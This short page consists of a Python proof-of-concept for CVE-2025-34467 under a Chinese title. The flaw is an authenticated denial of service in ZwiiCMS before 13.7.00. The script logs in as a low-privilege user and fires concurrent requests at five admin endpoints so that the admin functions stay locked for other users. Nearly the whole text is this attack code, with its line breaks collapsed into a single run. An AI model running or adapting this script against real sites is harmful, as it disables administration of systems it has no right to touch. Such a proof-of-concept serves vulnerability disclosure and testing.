CVE-2025-34467: ZwiiCMS 授权检查缺陷导致认证用户DoS漏洞

import requests import time from concurrent.futures import ThreadPoolExecutor # CVE-2025-34467 PoC - ZwiiCMS Authenticated DoS via Lock Persistence # Target: ZwiiCMS versions < 13.7.00 TARGET_URL = "http://target-website.com" LOGIN_URL = f"{TARGET_URL}/core/user/login" ADMIN_PAGE = f"{TARGET_URL}/core/coreManager/access" session = requests.Session() def login(): """Authenticate as low-privilege user""" login_data = { 'credentialEmail': '[email protected]', 'credentialPassword': 'attacker_password' } response = session.post(LOGIN_URL, data=login_data) return response.status_code == 200 def trigger_lock(endpoint): """Send request to trigger resource lock before auth check""" headers = { 'X-Requested-With': 'XMLHttpRequest', 'Content-Type': 'application/x-www-form-urlencoded' } response = session.get(f"{TARGET_URL}{endpoint}", headers=headers) return { 'endpoint': endpoint, 'status': response.status_code, 'locked': '404' in str(response.status_code) } def main(): if not login(): print("[-] Login failed") return print("[+] Logged in as low-privilege user") # List of admin endpoints to lock admin_endpoints = [ '/core/userManager', '/core/coreManager', '/core/dataManager', '/core/themeManager', '/core/extensionManager' ] # Send concurrent requests to lock multiple admin functions with ThreadPoolExecutor(max_workers=5) as executor: results = list(executor.map(trigger_lock, admin_endpoints)) print("[+] Lock persistence attack completed") for result in results: print(f"[*] Endpoint: {result['endpoint']}, Status: {result['status']}") print("[*] Admin functions are now locked until session ends") print("[*] Other users (including admins) cannot access affected functionality") if __name__ == "__main__": main()